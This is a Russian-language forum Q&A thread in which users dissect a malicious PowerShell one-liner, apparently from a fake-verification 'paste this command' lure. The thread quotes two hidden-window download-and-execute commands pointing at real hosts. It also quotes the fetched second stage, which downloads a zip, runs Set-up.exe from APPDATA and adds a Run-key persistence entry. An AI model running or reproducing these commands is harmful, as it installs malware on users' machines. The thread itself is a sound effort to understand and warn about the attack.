Что делает это команда в повер шелл?

makaks ibolit Ученик (168), на голосовании 2 недели назад
powershell.exe -W Hidden -command $url = ' https://validititytext.b-cdn.net/tesla.txt '; $response = Invoke-WebRequest -Uri $url -UseBasicParsing; $text = $response.Content; iex $text
Голосование за лучший ответ
MaXX1020 Оракул (58325) 1 месяц назад
Скачивает файл по ссылке и выполняет его. Как я понял это кусок вируса какого то.
Rii Gii Мудрец (19549) 1 месяц назад
Загружает какие-то скрипты которые взаимодействуют с защитником Windows и центром обновления. Что именно делает, не знаю. Откуда взял конечно не ответишь, однодневка
ᛟᏔҨŁ₣ᛟ Искусственный Интеллект (291739) 1 месяц назад
Ух, а в файле tesla.txt прописано куча всякого навоза на загрузку, установку, запуск, и помещения в автозапуск.
Shurovik Искусственный Интеллект (710015) 1 месяц назад
По ссылке качается текстовой файл:
$Ah0dZTZt='https://validitycheck.b-cdn.net/tesla.zip'; $3tx7yBPN=$env:APPDATA+'\UWRyTewt'; $KF02tLkP=$env:APPDATA+'\nzCo6OXS.zip'; $4QlDAVYK=$3tx7yBPN+'\Set-up.exe'; if (-not (tesT-PAth $3tx7yBPN)) { NeW-iTEM -Path $3tx7yBPN -ItemType Directory }; sTARt-BItSTransfEr -Source $Ah0dZTZt -Destination $KF02tLkP; eXpaND-aRchIve -Path $KF02tLkP -DestinationPath $3tx7yBPN -Force; REMOvE-itEm $KF02tLkP; stART-pROCESs $4QlDAVYK; nEw-ItEMPrOPERTY -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Z51X6k99' -Value $4QlDAVYK -PropertyType 'String';
Может быть, и майнер какой-то....
Denis Sergo Ученик (106) 1 неделю назад
лично я нашел сайт с скачкой музыки и в верификации было win + r, ctrl + v, enter и в cntrl + v было powershell.exe -W Hidden -command $url=' https://storageinstance.oss-ap-southeast-1.aliyuncs.com/secrator.txt '; $response=Invoke-WebRequest -Uri $url -UseBasicParsing; $content=$response.Content; iex $content